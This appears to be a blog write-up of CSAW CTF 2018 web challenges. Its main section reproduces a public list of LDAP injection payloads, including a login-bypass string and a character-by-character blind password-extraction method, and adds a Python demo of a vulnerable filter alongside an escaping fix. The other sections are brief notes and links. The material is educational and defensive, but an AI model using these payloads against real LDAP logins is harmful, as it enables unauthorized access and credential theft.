CSAW CTF

The web challenges were of pretty high quality.

ldab

Judging by the name, this is probably LDAP injection.

I tried the payload from nox last time, but it didn't work.

Searched around on GitHub:

https://github.com/trapp3rhat/LDAP-injection

LDAP-injection
Ldap injection payloads
LDAP injection
LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
Exploitation
user = *)(uid=*))(|(uid=*
pass = password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
Payloads
*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
Blind Exploitation
We can extract using a bypass login
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
(&(sn=administrator)(password=MY*)) : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK

*)(uid=*))(|(uid=* got it straight away.

The page happens to have the uid parameter; swapping it for any other attribute that exists also works.
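To make concrete why the bypass payload quoted above works and what the fix looks like, here is an added example; it is my own code, not part of this writeup or of the linked LDAP-injection repository. It assumes the login built its filter by plain string concatenation (a guess about the challenge, not something the page confirms), uses a hand-written RFC 4515 escape routine, and evaluates filters with a small toy parser over a constructed in-memory directory. It also covers the blind prefix-probe technique from the README's second section, showing that escaping neutralizes both the login bypass and the character-by-character probe while real credentials still authenticate.

```python
import re

# Characters RFC 4515 requires to be escaped inside a filter assertion value.
_FILTER_SPECIALS = "\\*()\x00"


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied value for use inside an LDAP search filter
    (RFC 4515 style, e.g. '*' -> '\\2a'). Hand-written here for illustration;
    production code should use the LDAP library's own escaping helper."""
    return "".join("\\%02x" % ord(c) if c in _FILTER_SPECIALS else c for c in value)


def build_filter_unsafe(user: str, password: str) -> str:
    """Assumed vulnerable pattern: raw string concatenation of user input."""
    return "(&(uid=%s)(userPassword=%s))" % (user, password)


def build_filter_safe(user: str, password: str) -> str:
    """Hardened form: every value is escaped before it enters the filter."""
    return "(&(uid=%s)(userPassword=%s))" % (
        escape_filter_value(user), escape_filter_value(password))


# --- toy LDAP filter parser/evaluator, enough to show each filter's effect ---

def parse_filter(s: str, i: int = 0):
    """Parse one complete filter starting at s[i]; return (node, next_index)."""
    if s[i] != "(":
        raise ValueError("expected '(' at offset %d" % i)
    i += 1
    if s[i] in "&|":
        op, i, children = s[i], i + 1, []
        while s[i] == "(":
            child, i = parse_filter(s, i)
            children.append(child)
        if s[i] != ")":
            raise ValueError("unterminated %s filter" % op)
        return (op, children), i + 1
    if s[i] == "!":
        child, i = parse_filter(s, i + 1)
        if s[i] != ")":
            raise ValueError("unterminated ! filter")
        return ("!", [child]), i + 1
    eq = s.index("=", i)
    # The first raw ')' ends the value, so an unescaped ')' in user input
    # closes the assertion early: that is the injection point.
    close = s.index(")", eq)
    return ("=", s[i:eq], s[eq + 1:close]), close + 1


def _unescape(v: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), v)


def _value_matches(pattern: str, actual: str) -> bool:
    # A raw '*' is a wildcard; an escaped '\2a' is split off before unescaping,
    # so it is matched literally.
    pieces = [re.escape(_unescape(p)) for p in pattern.split("*")]
    return re.fullmatch(".*".join(pieces), actual) is not None


def evaluate(node, entry: dict) -> bool:
    kind = node[0]
    if kind == "&":
        return all(evaluate(c, entry) for c in node[1])
    if kind == "|":
        return any(evaluate(c, entry) for c in node[1])
    if kind == "!":
        return not evaluate(node[1][0], entry)
    _, attr, pattern = node
    actual = entry.get(attr.lower())
    return actual is not None and _value_matches(pattern, actual)


# Constructed sample directory (not the challenge's data); the admin password
# mirrors the "MYKE" value used in the README's blind-exploitation walkthrough.
DIRECTORY = [
    {"uid": "admin", "userpassword": "MYKE"},
    {"uid": "alice", "userpassword": "hunter2"},
]


def search(filter_str: str) -> list:
    """Return the uids matching the first complete filter in filter_str.
    Simplification assumed here: text after that filter is ignored, which is
    the effect the README's 'query = ...' line describes."""
    node, _ = parse_filter(filter_str)
    return [e["uid"] for e in DIRECTORY if evaluate(node, e)]


def login(user: str, password: str, build) -> list:
    return search(build(user, password))


BYPASS = "*)(uid=*))(|(uid=*"   # the login-bypass payload quoted above

if __name__ == "__main__":
    print(login(BYPASS, "wrong", build_filter_unsafe))  # ['admin', 'alice']: everyone matches
    print(login(BYPASS, "wrong", build_filter_safe))    # []: payload is now a literal uid
    print(login("admin", "M*", build_filter_unsafe))    # ['admin']: blind prefix probe succeeds
    print(login("admin", "M*", build_filter_safe))      # []: '*' is escaped, no wildcard
    print(login("admin", "MYKE", build_filter_safe))    # ['admin']: real credentials still work
```

In real code the escape step should come from the LDAP library rather than a hand-rolled function (for example `ldap3.utils.conv.escape_filter_chars` in Python or `ldap_escape` in PHP), and a login should bind with the supplied password rather than compare `userPassword` in a search filter at all, which removes the blind-probe channel entirely.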

SSO

Great challenge; I paid my tuition on this one. It needs knowledge of SSO and OAuth 2.0, and JWT is involved too.

I read up on OAuth for a long time and still feel I haven't quite got to the point.

An OAuth security case study that looks good, although it isn't the point of this challenge:

https://coolshell.cn/articles/11021.html

Reference
https://github.com/TryCTFAgain/CTF-Writeups/blob/master/2018/CSAW%20CTF'18/web.md#sso

Hacker Movie Club

A browser caching problem. Challenges from abroad really are novel; tuition paid again.

Reference
https://lud1161.github.io/posts/hacker-movie-club-csaw-quals-2018/

wtf sql

The final challenge; reading through it slowly.

https://blog.rpis.ec/2018/09/csaw-ctf-quals-2018-wtf-sql.html
Found a writeup by a Chinese master; reading it in Chinese is so much nicer, machine translation is really...
https://qvq.im/post/CASW%20CTF%202018%20WTF.SQL%20writeup